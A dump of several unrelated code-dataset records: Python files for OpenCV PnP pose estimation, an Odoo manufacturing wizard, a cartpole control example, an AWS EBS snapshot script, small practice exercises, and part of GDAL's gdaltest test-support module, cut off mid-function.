solvePnPRansac(A, B) -> Pose_B = Relative_Pose_A2B * Pose_A\n retval, rvec, tvec, inlier = cv2.solvePnPRansac(cur_pts_3d, ref_pts_2d, K, None, flags=cv2.SOLVEPNP_EPNP)\n\n if retval == True:\n R, jacobian = cv2.Rodrigues(rvec)\n pose_cur2ref = Pose3.fromRt(R, tvec)\n\n pose_ref2cur = pose_cur2ref.inverse()\n return pose_ref2cur, ref_pts_2d, cur_pts_2d\n else:\n return Pose3(), ref_pts_2d, cur_pts_2d\n\ndef testPnP_CV():\n print(\"Test PnP in OpenCV:\")\n pnp = PnP_CV()\n im_dir = \"\"\n refImg = cv2.imread(os.path.join(im_dir, '1_ref.png'))\n curImg = cv2.imread(os.path.join(im_dir, '1_cur.png'))\n curImg_depth = cv2.imread(os.path.join(im_dir, '1_cur_depth.png'), cv2.IMREAD_UNCHANGED)\n\n leftK = np.float32([[320, 0, 320], [0, 320, 240], [0, 0, 1]])\n pose, p_ref, p_cur = pnp.getPose(refImg, curImg, curImg_depth, leftK)\n\n\n print(\"Pose computed using PnP:\")\n pose.display()\n print(\"ground-truth Pose:\")\n pose_gt.display()\n\n\nif __name__ == \"__main__\":\n # testPnP_MVG()\n testPnP_CV()\n\n","sub_path":"RelativePose/ComputePnP.py","file_name":"ComputePnP.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"437076999","text":"# Copyright © 2020 Novobi, LLC\n# See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, fields, models, _\n\n\nclass MrpProductProduce(models.TransientModel):\n _inherit = \"mrp.product.produce\"\n\n def action_generate_serial(self):\n \"\"\"\n Override to add name when generating lot.\n \"\"\"\n self.ensure_one()\n product_produce_wiz = self.env.ref('mrp.view_mrp_product_produce_wizard', False)\n lot_name = self.env['stock.production.lot'].with_context(create_finished_product_lot=True).generate_lot_name()\n self.finished_lot_id = self.env['stock.production.lot'].create({\n 'name': lot_name,\n 'product_id': self.product_id.id,\n 'company_id': self.company_id.id,\n })\n return {\n 'name': _('Produce'),\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'res_model': 'mrp.product.produce',\n 'res_id': self.id,\n 'view_id': product_produce_wiz.id,\n 'target': 'new',\n }","sub_path":"pcp_mrp/wizard/mrp_product_produce.py","file_name":"mrp_product_produce.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"6114095","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Filename: example.py\n# @Date: 2019-06-30-15-21\n# @Author: Hany Abdulsamad\n# @Contact: hany@robot-learning.de\n\nimport autograd.numpy as np\nimport gym\n\nimport trajopt\nfrom trajopt.envs.quanser.cartpole.ctrl import SwingUpCtrl\n\n\n# quanser cartpole env\nenv = gym.make('Quanser-Cartpole-v0')\nenv._max_episode_steps = 1000000\n\nctrl = SwingUpCtrl()\n\nobs = env.reset()\nfor n in range(500):\n act = ctrl(obs)\n obs, _, done, _ = env.step(act)\n if done:\n break\n\n if np.mod(n, 50) == 0:\n env.render()\n","sub_path":"rl/envs/control/quanser/cartpole/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"140125698","text":"#!/usr/bin/python3\nimport boto3 \nimport time\n\nfrom collections import defaultdict\n\nclass Snapshot:\n def __init__(self):\n self.ec2_resource = boto3.resource('ec2')\n self.ec2_client = self.ec2_resource.meta.client\n self.filters = [{ 'Name': 'tag:backup', 'Values': ['true']}] \n self.instances_matching_filters = self.ec2_client.describe_instances(Filters=self.filters)\n ##Return list of ec2 instances matching filters above\n def list_matching_instances(self):\n instance_list = defaultdict(list)\n for i in (self.instances_matching_filters[\"Reservations\"]):\n for instance in i[\"Instances\"]: \n##Add InstanceId as key and value\n instance_list[(instance[\"InstanceId\"])].append(instance[\"InstanceId\"])\n ##Add volume id's as values to InstanceId key\n for x in instance[\"BlockDeviceMappings\"]:\n instance_list[(instance[\"InstanceId\"])].append(x[\"Ebs\"][\"VolumeId\"])\n return instance_list\n def snapshot(self, volume_id, description):\n self.ec2_resource.test_create_snapshot(VolumeId=volume_id, Description=description)\n \n def stop_instance(self, instance_id):\n self.ec2_resource.Instance(instance_id).stop()\n \n ##Snapshot list must have instance ID first, and then volume IDs\n def snapshot_matching_instances(self):\n instance_list = self.list_matching_instances()\n for k,v in instance_list.items():\n instance_id = v.pop(0)\n self.stop_instance(instance_id)\n while self.ec2_resource.Instance(instance_id).state['Name'] != \"stopped\":\n time.sleep(5)\n print(\"waiting for instance \" + instance_id + \" to stop\")\n for i in v:\n snapshot = self.ec2_resource.create_snapshot(VolumeId=i,Description=instance_id)\n while snapshot.state != 'completed':\n time.sleep(10)\n snapshot.load()\n print(\"Waiting for snapshot for \" + instance_id + \" to complete\")\n else:\n continue\n self.ec2_resource.Instance(instance_id).start()\n while self.ec2_resource.Instance(instance_id).state['Name'] != \"running\":\n time.sleep(5)\n print(\"waiting for instance \" + instance_id + \" to start\") \n\nif __name__ == \"__main__\":\n a = Snapshot()\n b = a.snapshot_matching_instances()\n","sub_path":"create_aws_snapshots.py","file_name":"create_aws_snapshots.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"252930218","text":"class MathDojo(int):\n def __add__(self, other):\n return {} + {}\n\n def __sub__(self, other):\n self.first = first\n self.second = second\n result = self.first - self.second\n return result\n\nmd = MathDojo()\nmd.add(0, 2)\n\n\n#part 1\n# class MathDojo(object):\n# def __init__(self):\n# self.result = 0\n# def add(self, *x):\n# self.addThis = 0\n# for value in x:\n# self.addThis += value\n# self.result += self.addThis\n# return self\n# def subtract(self, *y):\n# self.subThis = 0\n# for value in y:\n# self.subThis += value\n# self.result -= self.subThis\n# return self\n# md = MathDojo().add(2).add(2,5).subtract(3,2).result\n#\n# print md\n","sub_path":"Python_OOP/MathDojo.py","file_name":"MathDojo.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"64769436","text":"import pandas\ntable=pandas.read_csv(\"mysample.csv\")\nprint(table)\n\ndata1={\n 'one':pandas.Series([1,2,3],index=['a','b','c']),\n 'two':pandas.Series([1,2,3,4], index=['a','b','c','d',])\n }\ntables=pandas.DataFrame(data1)\ntables['three']=pandas.Series([10,20,30],index=['a','b','c'])\n\nrow=pandas.DataFrame([[11,13],[17,19]],columns=['one','three'])\ntables=tables.append(row)\ntables.to_csv(\"output.csv\")\n\n\ndata={'sample':pandas.Series([1,2,3,4],index=['a','b','c','d'])}\ntable=pandas.DataFrame(data)\nprint(table)\ntable.to_csv(\"data.csv\")","sub_path":"Module -4 NumKeyAndPandas/ReadinFileInPandas.py","file_name":"ReadinFileInPandas.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"161774314","text":"# -*- coding: utf-8 -*-\n###############################################################################\n# $Id$\n#\n# Project: GDAL/OGR Test Suite\n# Purpose: Python Library supporting GDAL/OGR Test Suite\n# Author: Frank Warmerdam \n#\n###############################################################################\n# Copyright (c) 2003, Frank Warmerdam \n# Copyright (c) 2008-2013, Even Rouault \n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n###############################################################################\n\nimport contextlib\nimport math\nimport os\nimport os.path\nimport stat\nimport sys\nfrom sys import version_info\nimport time\n\nfrom osgeo import gdal\nfrom osgeo import osr\nimport pytest\n\ncur_name = 'default'\n\nsuccess_counter = 0\nfailure_counter = 0\nexpected_failure_counter = 0\nblow_counter = 0\nskip_counter = 0\nfailure_summary = []\n\nreason = None\ncount_skipped_tests_download = 0\ncount_skipped_tests_slow = 0\nstart_time = None\nend_time = None\n\njp2kak_drv = None\njpeg2000_drv = None\njp2ecw_drv = None\njp2mrsid_drv = None\njp2openjpeg_drv = None\njp2lura_drv = None\njp2kak_drv_unregistered = False\njpeg2000_drv_unregistered = False\njp2ecw_drv_unregistered = False\njp2mrsid_drv_unregistered = False\njp2openjpeg_drv_unregistered = False\njp2lura_drv_unregistered = False\n\nif version_info >= (3, 0, 0):\n import gdaltest_python3 as gdaltestaux\nelse:\n import gdaltest_python2 as gdaltestaux\n\n# Process commandline arguments for stuff like --debug, --locale, --config\n\nargv = gdal.GeneralCmdLineProcessor(sys.argv)\n\n###############################################################################\n\n\ndef git_status():\n\n out, _ = runexternal_out_and_err('git status --porcelain .')\n return out\n\n\n###############################################################################\n\ndef get_lineno_2framesback(frames):\n try:\n import inspect\n frame = inspect.currentframe()\n while frames > 0:\n frame = frame.f_back\n frames = frames - 1\n\n return frame.f_lineno\n except ImportError:\n return -1\n\n###############################################################################\n\n\ndef post_reason(msg, frames=2):\n lineno = get_lineno_2framesback(frames)\n global reason\n\n if lineno >= 0:\n reason = 'line %d: %s' % (lineno, msg)\n else:\n reason = msg\n\n###############################################################################\n\n\ndef clean_tmp():\n all_files = os.listdir('tmp')\n for filename in all_files:\n if filename in ['CVS', 'do-not-remove']:\n continue\n\n try:\n os.remove('tmp/' + filename)\n except OSError:\n pass\n\n###############################################################################\n\n\ndef testCreateCopyInterruptCallback(pct, message, user_data):\n # pylint: disable=unused-argument\n return pct <= 0.5\n\n###############################################################################\n\n\nclass GDALTest(object):\n def __init__(self, drivername, filename, band, chksum,\n xoff=0, yoff=0, xsize=0, ysize=0, options=None,\n filename_absolute=0, chksum_after_reopening=None, open_options=None):\n self.driver = None\n self.drivername = drivername\n self.filename = filename\n self.filename_absolute = filename_absolute\n self.band = band\n self.chksum = chksum\n if chksum_after_reopening is not None:\n if isinstance(chksum_after_reopening, list):\n self.chksum_after_reopening = chksum_after_reopening\n else:\n self.chksum_after_reopening = [chksum_after_reopening]\n elif chksum is None:\n self.chksum_after_reopening = None\n else:\n self.chksum_after_reopening = [chksum]\n self.xoff = xoff\n self.yoff = yoff\n self.xsize = xsize\n self.ysize = ysize\n self.options = [] if options is None else options\n self.open_options = open_options\n\n def testDriver(self):\n if self.driver is None:\n self.driver = gdal.GetDriverByName(self.drivername)\n if self.driver is None:\n pytest.skip(self.drivername + ' driver not found!')\n\n def testOpen(self, check_prj=None, check_gt=None, gt_epsilon=None,\n check_stat=None, check_approx_stat=None,\n stat_epsilon=None, skip_checksum=None, check_min=None,\n check_max=None, check_filelist=True):\n \"\"\"check_prj - projection reference, check_gt - geotransformation\n matrix (tuple), gt_epsilon - geotransformation tolerance,\n check_stat - band statistics (tuple), stat_epsilon - statistics\n tolerance.\"\"\"\n self.testDriver()\n\n if self.filename_absolute:\n wrk_filename = self.filename\n else:\n wrk_filename = 'data/' + self.filename\n\n if self.open_options:\n ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n assert ds is not None, ('Failed to open dataset: ' + wrk_filename)\n\n assert ds.GetDriver().ShortName == gdal.GetDriverByName(self.drivername).ShortName, \\\n ('The driver of the returned dataset is %s instead of %s.' % (ds.GetDriver().ShortName, self.drivername))\n\n if self.xsize == 0 and self.ysize == 0:\n self.xsize = ds.RasterXSize\n self.ysize = ds.RasterYSize\n\n if check_filelist and ds.GetDriver().GetMetadataItem('DCAP_VIRTUALIO') is not None:\n fl = ds.GetFileList()\n if fl is not None and fl and wrk_filename == fl[0]:\n\n # Copy all files in /vsimem/\n mainfile_dirname = os.path.dirname(fl[0])\n for filename in fl:\n target_filename = '/vsimem/tmp_testOpen/' + filename[len(mainfile_dirname) + 1:]\n if stat.S_ISDIR(gdal.VSIStatL(filename).mode):\n gdal.Mkdir(target_filename, 0)\n else:\n f = gdal.VSIFOpenL(filename, 'rb')\n assert f is not None, ('File %s does not exist' % filename)\n gdal.VSIFSeekL(f, 0, 2)\n size = gdal.VSIFTellL(f)\n gdal.VSIFSeekL(f, 0, 0)\n data = gdal.VSIFReadL(1, size, f)\n gdal.VSIFCloseL(f)\n if data is None:\n data = ''\n gdal.FileFromMemBuffer(target_filename, data)\n\n # Try to open the in-memory file\n main_virtual_filename = '/vsimem/tmp_testOpen/' + os.path.basename(fl[0])\n virtual_ds = gdal.Open(main_virtual_filename)\n virtual_ds_is_None = virtual_ds is None\n virtual_ds = None\n\n # Make sure the driver is specific enough by trying to open\n # with all other drivers but it\n drivers = []\n for i in range(gdal.GetDriverCount()):\n drv_name = gdal.GetDriver(i).ShortName\n if drv_name.lower() != self.drivername.lower() and not \\\n ((drv_name.lower() == 'gif' and self.drivername.lower() == 'biggif') or\n (drv_name.lower() == 'biggif' and self.drivername.lower() == 'gif')):\n drivers += [drv_name]\n other_ds = gdal.OpenEx(main_virtual_filename, gdal.OF_RASTER, allowed_drivers=drivers)\n other_ds_is_None = other_ds is None\n other_ds_driver_name = None\n if not other_ds_is_None:\n other_ds_driver_name = other_ds.GetDriver().ShortName\n other_ds = None\n\n for filename in gdal.ReadDirRecursive('/vsimem/tmp_testOpen'):\n gdal.Unlink('/vsimem/tmp_testOpen/' + filename)\n\n assert not virtual_ds_is_None, \\\n 'File list is not complete or driver does not support /vsimem/'\n assert other_ds_is_None, \\\n ('When excluding %s, dataset is still opened by driver %s' % (self.drivername, other_ds_driver_name))\n\n # Do we need to check projection?\n if check_prj is not None:\n new_prj = ds.GetProjection()\n\n src_osr = osr.SpatialReference()\n src_osr.SetFromUserInput(check_prj)\n\n new_osr = osr.SpatialReference(wkt=new_prj)\n\n if not src_osr.IsSame(new_osr):\n print('')\n print('old = %s' % src_osr.ExportToPrettyWkt())\n print('new = %s' % new_osr.ExportToPrettyWkt())\n pytest.fail('Projections differ')\n\n # Do we need to check geotransform?\n if check_gt:\n # Default to 100th of pixel as our test value.\n if gt_epsilon is None:\n gt_epsilon = (abs(check_gt[1]) + abs(check_gt[2])) / 100.0\n\n new_gt = ds.GetGeoTransform()\n for i in range(6):\n if abs(new_gt[i] - check_gt[i]) > gt_epsilon:\n print('')\n print('old = ', check_gt)\n print('new = ', new_gt)\n pytest.fail('Geotransform differs.')\n\n oBand = ds.GetRasterBand(self.band)\n if skip_checksum is None:\n chksum = oBand.Checksum(self.xoff, self.yoff, self.xsize, self.ysize)\n\n # Do we need to check approximate statistics?\n if check_approx_stat:\n # Default to 1000th of pixel value range as our test value.\n if stat_epsilon is None:\n stat_epsilon = \\\n abs(check_approx_stat[1] - check_approx_stat[0]) / 1000.0\n\n new_stat = oBand.GetStatistics(1, 1)\n for i in range(4):\n\n # NOTE - mloskot: Poor man Nan/Inf value check. It's poor\n # because we need to support old and buggy Python 2.3.\n # Tested on Linux, Mac OS X and Windows, with Python 2.3/2.4/2.5.\n sv = str(new_stat[i]).lower()\n assert not ('n' in sv or 'i' in sv or '#' in sv), \\\n ('NaN or infinity value encountered \\'%s\\'.' % sv)\n\n if abs(new_stat[i] - check_approx_stat[i]) > stat_epsilon:\n print('')\n print('old = ', check_approx_stat)\n print('new = ', new_stat)\n pytest.fail('Approximate statistics differs.')\n\n # Do we need to check statistics?\n if check_stat:\n # Default to 1000th of pixel value range as our test value.\n if stat_epsilon is None:\n stat_epsilon = abs(check_stat[1] - check_stat[0]) / 1000.0\n\n # FIXME: how to test approximate statistic results?\n new_stat = oBand.GetStatistics(1, 1)\n\n new_stat = oBand.GetStatistics(0, 1)\n for i in range(4):\n\n sv = str(new_stat[i]).lower()\n assert not ('n' in sv or 'i' in sv or '#' in sv), \\\n ('NaN or infinity value encountered \\'%s\\'.' % sv)\n\n if abs(new_stat[i] - check_stat[i]) > stat_epsilon:\n print('')\n print('old = ', check_stat)\n print('new = ', new_stat)\n pytest.fail('Statistics differs.')\n\n if check_min:\n assert oBand.GetMinimum() == check_min, \\\n ('Unexpected minimum value %s' % str(oBand.GetMinimum()))\n\n if check_max:\n assert oBand.GetMaximum() == check_max, \\\n ('Unexpected maximum value %s' % str(oBand.GetMaximum()))\n\n ds = None\n\n assert not is_file_open(wrk_filename), 'file still open after dataset closing'\n\n if skip_checksum is not None:\n return\n if self.chksum is None or chksum == self.chksum:\n return\n pytest.fail('Checksum for band %d in \"%s\" is %d, but expected %d.'\n % (self.band, self.filename, chksum, self.chksum))\n\n def testCreateCopy(self, check_minmax=1, check_gt=0, check_srs=None,\n vsimem=0, new_filename=None, strict_in=0,\n skip_preclose_test=0, delete_copy=1, gt_epsilon=None,\n check_checksum_not_null=None, interrupt_during_copy=False,\n dest_open_options=None, quiet_error_handler=True):\n\n self.testDriver()\n\n if self.filename_absolute:\n wrk_filename = self.filename\n else:\n wrk_filename = 'data/' + self.filename\n\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n if self.band > 0:\n minmax = src_ds.GetRasterBand(self.band).ComputeRasterMinMax()\n\n src_prj = src_ds.GetProjection()\n src_gt = src_ds.GetGeoTransform()\n\n if new_filename is None:\n if vsimem:\n new_filename = '/vsimem/' + os.path.basename(self.filename) + '.tst'\n else:\n new_filename = 'tmp/' + os.path.basename(self.filename) + '.tst'\n\n if quiet_error_handler:\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n if interrupt_during_copy:\n new_ds = self.driver.CreateCopy(new_filename, src_ds,\n strict=strict_in,\n options=self.options,\n callback=testCreateCopyInterruptCallback)\n else:\n new_ds = self.driver.CreateCopy(new_filename, src_ds,\n strict=strict_in,\n options=self.options)\n if quiet_error_handler:\n gdal.PopErrorHandler()\n\n if interrupt_during_copy:\n if new_ds is None:\n gdal.PushErrorHandler('CPLQuietErrorHandler')\n self.driver.Delete(new_filename)\n gdal.PopErrorHandler()\n return\n new_ds = None\n self.driver.Delete(new_filename)\n pytest.fail('CreateCopy() should have failed due to interruption')\n\n assert new_ds is not None, ('Failed to create test file using CreateCopy method.' +\n '\\n' + gdal.GetLastErrorMsg())\n\n assert new_ds.GetDriver().ShortName == gdal.GetDriverByName(self.drivername).ShortName, \\\n ('The driver of the returned dataset is %s instead of %s.' % (new_ds.GetDriver().ShortName, self.drivername))\n\n if self.band > 0 and skip_preclose_test == 0:\n bnd = new_ds.GetRasterBand(self.band)\n if check_checksum_not_null is True:\n assert bnd.Checksum() != 0, 'Got null checksum on still-open file.'\n elif self.chksum is not None and bnd.Checksum() != self.chksum:\n pytest.fail(\n 'Did not get expected checksum on still-open file.\\n'\n ' Got %d instead of %d.' % (bnd.Checksum(), self.chksum))\n if check_minmax:\n got_minmax = bnd.ComputeRasterMinMax()\n assert got_minmax == minmax, \\\n ('Did not get expected min/max values on still-open file.\\n'\n ' Got %g,%g instead of %g,%g.'\n % (got_minmax[0], got_minmax[1], minmax[0], minmax[1]))\n\n bnd = None\n new_ds = None\n\n # hopefully it's closed now!\n\n if dest_open_options is not None:\n new_ds = gdal.OpenEx(new_filename, gdal.OF_RASTER, open_options=dest_open_options)\n else:\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n if self.band > 0:\n bnd = new_ds.GetRasterBand(self.band)\n if check_checksum_not_null is True:\n assert bnd.Checksum() != 0, 'Got null checksum on reopened file.'\n elif self.chksum_after_reopening is not None and bnd.Checksum() not in self.chksum_after_reopening:\n pytest.fail('Did not get expected checksum on reopened file.\\n'\n ' Got %d instead of %s.'\n % (bnd.Checksum(), str(self.chksum_after_reopening)))\n\n if check_minmax:\n got_minmax = bnd.ComputeRasterMinMax()\n assert got_minmax == minmax, \\\n ('Did not get expected min/max values on reopened file.\\n'\n ' Got %g,%g instead of %g,%g.'\n % (got_minmax[0], got_minmax[1], minmax[0], minmax[1]))\n\n # Do we need to check the geotransform?\n if check_gt:\n if gt_epsilon is None:\n eps = 0.00000001\n else:\n eps = gt_epsilon\n new_gt = new_ds.GetGeoTransform()\n if abs(new_gt[0] - src_gt[0]) > eps \\\n or abs(new_gt[1] - src_gt[1]) > eps \\\n or abs(new_gt[2] - src_gt[2]) > eps \\\n or abs(new_gt[3] - src_gt[3]) > eps \\\n or abs(new_gt[4] - src_gt[4]) > eps \\\n or abs(new_gt[5] - src_gt[5]) > eps:\n print('')\n print('old = ', src_gt)\n print('new = ', new_gt)\n pytest.fail('Geotransform differs.')\n\n # Do we need to check the geotransform?\n if check_srs is not None:\n new_prj = new_ds.GetProjection()\n\n src_osr = osr.SpatialReference(wkt=src_prj)\n new_osr = osr.SpatialReference(wkt=new_prj)\n\n if not src_osr.IsSame(new_osr):\n print('')\n print('old = %s' % src_osr.ExportToPrettyWkt())\n print('new = %s' % new_osr.ExportToPrettyWkt())\n pytest.fail('Projections differ')\n\n bnd = None\n new_ds = None\n src_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON' and delete_copy == 1:\n self.driver.Delete(new_filename)\n\n def testCreate(self, vsimem=0, new_filename=None, out_bands=1,\n check_minmax=1, dest_open_options=None):\n self.testDriver()\n\n if self.filename_absolute:\n wrk_filename = self.filename\n else:\n wrk_filename = 'data/' + self.filename\n\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n src_img = src_ds.GetRasterBand(self.band).ReadRaster(0, 0, xsize, ysize)\n minmax = src_ds.GetRasterBand(self.band).ComputeRasterMinMax()\n\n if new_filename is None:\n if vsimem:\n new_filename = '/vsimem/' + self.filename + '.tst'\n else:\n new_filename = 'tmp/' + self.filename + '.tst'\n\n new_ds = self.driver.Create(new_filename, xsize, ysize, out_bands,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n src_ds = None\n\n try:\n for band in range(1, out_bands + 1):\n new_ds.GetRasterBand(band).WriteRaster(0, 0, xsize, ysize, src_img)\n except:\n pytest.fail('Failed to write raster bands to test file.')\n\n for band in range(1, out_bands + 1):\n assert self.chksum is None or new_ds.GetRasterBand(band).Checksum() == self.chksum, \\\n ('Did not get expected checksum on still-open file.\\n'\n ' Got %d instead of %d.'\n % (new_ds.GetRasterBand(band).Checksum(), self.chksum))\n\n computed_minmax = new_ds.GetRasterBand(band).ComputeRasterMinMax()\n if computed_minmax != minmax and check_minmax:\n print('expect: ', minmax)\n print('got: ', computed_minmax)\n pytest.fail('Did not get expected min/max values on still-open file.')\n\n new_ds = None\n\n if dest_open_options is not None:\n new_ds = gdal.OpenEx(new_filename, gdal.OF_RASTER, open_options=dest_open_options)\n else:\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n for band in range(1, out_bands + 1):\n assert self.chksum is None or new_ds.GetRasterBand(band).Checksum() == self.chksum, \\\n ('Did not get expected checksum on reopened file.'\n ' Got %d instead of %d.'\n % (new_ds.GetRasterBand(band).Checksum(), self.chksum))\n\n assert new_ds.GetRasterBand(band).ComputeRasterMinMax() == minmax or not check_minmax, \\\n 'Did not get expected min/max values on reopened file.'\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetGeoTransform(self):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n gt = (123.0, 1.18, 0.0, 456.0, 0.0, -1.18)\n assert new_ds.SetGeoTransform(gt) is gdal.CE_None, \\\n 'Failed to set geographic transformation.'\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n eps = 0.00000001\n new_gt = new_ds.GetGeoTransform()\n if abs(new_gt[0] - gt[0]) > eps \\\n or abs(new_gt[1] - gt[1]) > eps \\\n or abs(new_gt[2] - gt[2]) > eps \\\n or abs(new_gt[3] - gt[3]) > eps \\\n or abs(new_gt[4] - gt[4]) > eps \\\n or abs(new_gt[5] - gt[5]) > eps:\n print('')\n print('old = ', gt)\n print('new = ', new_gt)\n pytest.fail('Did not get expected geotransform.')\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetProjection(self, prj=None, expected_prj=None):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n gt = (123.0, 1.18, 0.0, 456.0, 0.0, -1.18)\n if prj is None:\n # This is a challenging SRS since it has non-meter linear units.\n prj = 'PROJCS[\"NAD83 / Ohio South\",GEOGCS[\"NAD83\",DATUM[\"North_American_Datum_1983\",SPHEROID[\"GRS 1980\",6378137,298.257222101,AUTHORITY[\"EPSG\",\"7019\"]],AUTHORITY[\"EPSG\",\"6269\"]],PRIMEM[\"Greenwich\",0,AUTHORITY[\"EPSG\",\"8901\"]],UNIT[\"degree\",0.01745329251994328,AUTHORITY[\"EPSG\",\"9122\"]],AUTHORITY[\"EPSG\",\"4269\"]],PROJECTION[\"Lambert_Conformal_Conic_2SP\"],PARAMETER[\"standard_parallel_1\",40.03333333333333],PARAMETER[\"standard_parallel_2\",38.73333333333333],PARAMETER[\"latitude_of_origin\",38],PARAMETER[\"central_meridian\",-82.5],PARAMETER[\"false_easting\",1968500],PARAMETER[\"false_northing\",0],UNIT[\"US survey foot\",0.3048006096012192]]'\n\n src_osr = osr.SpatialReference()\n src_osr.ImportFromWkt(prj)\n\n new_ds.SetGeoTransform(gt)\n assert new_ds.SetProjection(prj) is gdal.CE_None, \\\n 'Failed to set geographic projection string.'\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n expected_osr = osr.SpatialReference()\n if expected_prj is None:\n expected_osr = src_osr\n else:\n expected_osr.ImportFromWkt(expected_prj)\n\n new_osr = osr.SpatialReference()\n new_osr.ImportFromWkt(new_ds.GetProjection())\n if not new_osr.IsSame(expected_osr):\n print('Got: ')\n print(new_osr.ExportToPrettyWkt())\n print('Expected:')\n print(expected_osr.ExportToPrettyWkt())\n pytest.fail('Did not get expected projection reference.')\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetMetadata(self):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n new_ds.SetMetadata({'TEST_KEY': 'TestValue'})\n # FIXME\n # if new_ds.SetMetadata( dict ) is not gdal.CE_None:\n # print new_ds.SetMetadata( dict )\n # post_reason( 'Failed to set metadata item.' )\n # return 'fail'\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n md_dict = new_ds.GetMetadata()\n\n assert 'TEST_KEY' in md_dict, 'Metadata item TEST_KEY does not exist.'\n\n assert md_dict['TEST_KEY'] == 'TestValue', 'Did not get expected metadata item.'\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetNoDataValue(self, delete=False):\n 